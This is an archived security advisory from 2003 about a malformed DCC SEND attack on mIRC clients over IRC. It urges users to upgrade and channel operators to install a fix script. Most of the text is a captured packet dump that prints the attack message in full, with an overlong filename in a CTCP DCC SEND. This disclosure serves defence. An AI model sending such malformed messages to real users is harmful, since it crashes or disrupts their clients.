asl_plz.txt

2003-10-27T00:00:00
ID PACKETSTORM:31889
Type packetstorm
Reporter Omi Da
Modified 2003-10-27T00:00:00

Description

                                        
                                            `Hi all, just camed today at work and i started sniffing a bit using ngrep  
(http://www.packetfactory.net/projects/ngrep/), guess what i`ve got?   
Thousand of freaks (yeah of course Undernet) using this fake DCCs, but   
not only as private messages this has taken the following form  
/msg #channel DCC SEND "shit....  
Well i`m making this public before it will extend into a IRC virus and i  
encourage all the "asl pls,10x and lamers like theese" to upgrade to  
mIRC 6.12 and operators of channels should get this script  
http://www.erler.org/Olathe/exploit%20fix.mrc, and of course modify it  
for autoban.  
(i`m too lazy to do it). Below it`s your beloved packet.  
  
T x.x.x.x:6667 -> x.x.x.x:1927 [AP]  
3a 61 77 6a 66 64 67 61 64 21 73 74 31 40 xx xx :awjfdgad!st1@xx  
2e xx xx 2e xx xx xx 2e xx xx 30 20 50 52 49 56 .xx.xxx.xxx PRIV  
4d 53 47 20 4f 6d 69 4b 72 4f 6e 20 3a 01 44 43 MSG OmiKrOn :.DC  
43 20 53 45 4e 44 20 22 61 20 61 20 61 20 61 20 C SEND "a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 61 20 61 20 61 20 61 20 61 20 61 20 a a a a a a a a  
61 20 61 20 22 20 31 30 37 39 30 39 35 38 34 38 a a " 1079095848  
20 36 36 36 01 0d 0a 666...  
  
  
I just cutted all the IPs just to keep it down.  
Greetings #linuxsecurity (Undernet).`